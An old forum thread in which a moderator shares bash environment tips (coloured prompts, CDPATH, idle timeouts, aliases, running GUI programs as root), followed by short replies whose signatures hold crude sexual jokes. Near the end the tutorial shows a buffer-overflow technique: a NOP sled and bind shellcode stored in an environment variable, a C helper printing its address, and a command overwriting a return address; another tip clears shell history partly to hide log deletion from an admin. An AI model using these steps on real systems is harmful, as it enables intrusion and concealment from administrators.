Author Topic: Using the Environment  (Read 3100 times)

0 Members and 1 Guest are viewing this topic.

Offline mynameistmp

  • Moderator
  • Full Member
  • *****
  • Posts: 111
  • Hi! I'm new here!
    • View Profile
Using the Environment
« on: July 16, 2005, 05:34:05 am »
I know that bash environment guides and tutorials are a dime a dozen, but I decided to make a to-the-point post about a few tips most of you newer guys should learn from the start, and throw in a few tricks some of you novice guys might not know yet. I'll try to keep this as brief as possible, but it's going to be fairly lengthy.

First of all, if you're operating a terminal as a regular user you might be jealous because root gets fancy colour coded output. This one's a quick and easy fix. All you have to do is edit your PS1 (system prompt) env variable:

Quote
export PS1=`echo -ne "\033[0;34m\u@\h:\033[0;36m\w\033[0;34m\$\033[0;37m "`

I wrapped the escape sequences in bold (\u -- username, \w -- working directory), the rest are ANSI escape sequences interpreted as colour codes. For the sake of brevity I'm not going to explain everything here, but here's a guide to the various colour codes here: http://www.linuxgazette.com/issue65/padala.html. Mess around with it to get the colour scheme you want.

Many people know that the PATH env variable stores the various directories to be scanned for scripts/executables to be executed, and MANPATH for man files, etc. Many people, however, overlook the CDPATH env variable. Try:

Quote
export CDPATH=.:~

Now whenever you do a cd <directory> it'll automatically search your home directory, so you don't have to prefix with ~/. Fool around with this a bit. You can add as many directories as you want, just delimit them with :. Note that as root you should be weary of editing your PATH env variable. If you add a directory writable to other users, they can add binaries that will be mistaken by you as typical programs and executed inadvertently as root.

We all know that ~/.bash_history stores everything interpreted by your bash shell. So you need to be careful if you're ever using shells to log into other services. If you enter some sensitive data (password) accidentally on the command line without realizing it before carriage returning it's possible the evil admin (or perhaps some other user!) will stumble upon your precious password when checking out your .bash_history, you'll probably want to erase it. Well, .bash_history is written everytime you log out, so doing rm .bash_history now isn't going to work. What you can do is this:

Quote
export HISTSIZE=0

This will completely clear your .bash_history file, and will write an empty file when you log out. Note: You could have logged out, logged back in, and rm .bash_history, but this trick is more convenient and the other way still leaves an rm command in your .bash_history and you might not want your admin to know you're deleting logs.

A system admin will typically use the w command (or some alternate method) in order to see who is logged into the server. Sometimes people will remotely login, execute a few commands, then just forget about their terminal, leaving it idle. Or perhaps they're using the system to run their irc client. If the person has gone out for the day and their client has terminated for whatever reason their connection will also idle. If you, as the admin, don't like hosting all of these idle users try this:

Quote
export TMOUT=600

This will make it so that bash automatically logs out any user who hasn't produced input for 10 minutes. Adjust the time (in seconds) as necessary. 

Let's say you're logged into an X session and you want to run a binary with root priviliges that outputs to a GUI. Let's also say it's unsafe to suid the program, and you don't want to add support for sudo on the system for security reasons. Try this series of commands:

Quote
sh-3.00$ set | grep DISPLAY
DISPLAY=:0.0
sh-3.00$ xhost +
access control disabled, clients can connect from any host
sh-3.00$ su -
Password:
root@tmp:~# export DISPLAY=:0.0
root@tmp:~# ethereal

Anything that uses xlib to draw to an X session that is executed as root on that command line will be drawn to display :0.0. Note that there are security issues inherent in this as well. xhost is used to control the ACLs that filter access to your X server. If you disable them, anyone able to connect to your X server will be able to output to your display. You may want to research how to limit acess to your X server via xhost.


Typically ps aux is more practical than regular old ps. Or maybe ls -a is preferred to ls. Getting tired of typing ps aux every time ? Set an alias:

Quote
sh-3.00$ cat << EOF > ~/.bashrc
> alias ps='ps aux'
> EOF
sh-3.00$ bash -ic ps | grep xterm
tmp       2659  0.0  0.8  5736 2304 tty1     S    Jul15   0:00 xterm -title Terminal
tmp       3909  0.0  1.3  5972 3464 tty1     S    02:22   0:00 xterm -title Terminal
tmp       3978  0.0  0.2  1688  600 pts/3    S+   02:28   0:00 grep xterm

Another use of environment variables is storing shellcode. Perhaps you've found a buffer overflow, but there isn't enough room in the buffer for your NOP sled and the lengthy bind shellcode you picked up off of metasploit. Pack a NOP sled and your shellcode into your env variable then use the address of the env variable to overwrite the return address on the stack instead of all of your shellcode:

Quote
export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`

Here's a quick little program in C that'll output the address of the env variable holding the shellcode:

Code: [Select]
#include <stdlib.h>

int main(int argc, char *argv[]) {
char *addr = getenv(argv[1]);
printf("\n%p\n", addr);
return 0;
}

Find the address of our shellcode and overwrite the stack's return address with our SHELLCODE env variable:

Quote
sh-3.00$ getenv SHELLCODE
SHELLCODE is located at 0xbffff892
sh-3.00$ ./vulnprog `perl -e 'print "\x92\xf8\xff\xbf"x10;'`

That's enough for now. bash when run as a login shell reads from /etc/profile, ~/.bash_profile, ~/.bash_login, ~/.profile in that order (assuming they exist). For any other kind of shell it reads from ~/.bashrc. So, if you want to make any of these env variables permanent, set them in the appropriate file for your shell.




« Last Edit: July 16, 2005, 05:37:44 am by mynameistmp »

Offline Newby

  • Moderator
  • Hero Member
  • *****
  • Posts: 10877
  • Thrash!
    • View Profile
Re: Using the Environment
« Reply #1 on: July 16, 2005, 01:12:45 pm »
Good read. :)
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Offline Ergot

  • 吴立峰 ^_^ !
  • x86
  • Hero Member
  • *****
  • Posts: 3724
  • I steal bandwidth. p_o
    • View Profile
Re: Using the Environment
« Reply #2 on: July 28, 2005, 02:50:41 pm »
Quote
First of all, if you're operating a terminal as a regular user you might be jealous because root gets fancy colour coded output. This one's a quick and easy fix. All you have to do is edit your PS1 (system prompt) env variable:

No :( I'm jealous because root doesn't get colors and regular users do :(
Who gives a damn? I fuck sheep all the time.
And yes, male both ends.  There are a couple lesbians that need a two-ended dildo...My router just refuses to wear a strap-on.
(05:55:03) JoE ThE oDD: omfg good job i got a boner thinkin bout them chinese bitches
(17:54:15) Sidoh: I love cosmetology

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Using the Environment
« Reply #3 on: July 28, 2005, 09:05:27 pm »
Quote
First of all, if you're operating a terminal as a regular user you might be jealous because root gets fancy colour coded output. This one's a quick and easy fix. All you have to do is edit your PS1 (system prompt) env variable:

No :( I'm jealous because root doesn't get colors and regular users do :(

"su -l" will do that.